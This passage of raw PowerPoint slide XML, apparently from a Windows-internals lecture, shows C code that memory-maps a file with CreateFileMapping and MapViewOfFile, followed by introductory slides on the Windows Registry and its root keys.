                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>return; }</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1600" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>hFileMapping = </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="1600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="ff0000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>CreateFileMapping</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>(hFile, NULL, PAGE_READONLY, 0, 0, NULL);</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1600" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>if ( hFileMapping = = 0 )</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1600" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>{   CloseHandle(hFile);</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1600" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>        </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>printf("Couldn't open file mapping with CreateFileMapping()\n");</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1600" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>        </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>return; }</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1600" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>lpFileBase = </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="1600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="ff0000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>MapViewOfFile</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>(hFileMapping, FILE_MAP_READ, 0, 0, 0);</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1600" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>if ( lpFileBase = = 0 )</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1600" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>{</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1600" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>        </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>CloseHandle(hFileMapping);</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1600" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>        </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>CloseHandle(hFile);</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1600" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>        </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>printf("Couldn't map view of file with MapViewOfFile()\n");</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1600" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>        </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>return;</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1600" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>}</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GB" sz="1600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>printf("Dump of file %s\n\n", filename);</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Windows Registry</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="627"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Window Registry: used to store OS and program configuration information, such as settings and options.</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="628" name="Google Shape;1135;p116" descr="Image result for windows registry"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2846520" y="2349000"/>
            <a:ext cx="6048360" cy="4169160"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="629" name="CustomShape 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="225720" y="2965680"/>
            <a:ext cx="2612880" cy="3382920"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0"/>
          <a:fillRef idx="0"/>
          <a:effectRef idx="0"/>
          <a:fontRef idx="minor"/>
        </p:style>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr marL="285840" indent="-285480">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="2400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Teko"/>
                <a:ea typeface="Teko"/>
              </a:rPr>
              <a:t>Hierarchical database</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2400" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285840" indent="-285480">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="2400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Teko"/>
                <a:ea typeface="Teko"/>
              </a:rPr>
              <a:t>5 top-level sections </a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2400" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="2400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Teko"/>
                <a:ea typeface="Teko"/>
              </a:rPr>
              <a:t>(HKEY)</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2400" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285840" indent="-285480">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="2400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Teko"/>
                <a:ea typeface="Teko"/>
              </a:rPr>
              <a:t>Subkey</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2400" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285840" indent="-285480">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="2400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Teko"/>
                <a:ea typeface="Teko"/>
              </a:rPr>
              <a:t>Key</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2400" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285840" indent="-285480">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="2400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Teko"/>
                <a:ea typeface="Teko"/>
              </a:rPr>
              <a:t>Value Entry</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2400" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285840" indent="-285480">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="2400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Teko"/>
                <a:ea typeface="Teko"/>
              </a:rPr>
              <a:t>Value (Data)</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Windows Registry</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="631"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Registry Root Keys</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="743040" indent="-285480">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="479"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="2400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>HKEY_LOCAL_MACHINE (HKLM)</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="3" marL="1600200" indent="-228240">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="360"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>Stores settings that are global to the local machine</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="743040" indent="-285480">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="479"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="2400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>HKEY_CURRENT_USER (HKCU)</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="3" marL="1600200" indent="-228240">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="360"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>Stores settings specific to the current user</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="743040" indent="-285480">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="479"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="2400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>HKEY_CLASSES_ROOT</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="3" marL="1600200" indent="-228240">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="360"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>Stores information defining types</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="743040" indent="-285480">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="479"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="2400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>HKEY_CURRENT_CONFIG</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="3" marL="1600200" indent="-228240">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="360"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>Stores settings about the current hardware configuration.</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:solidFill>
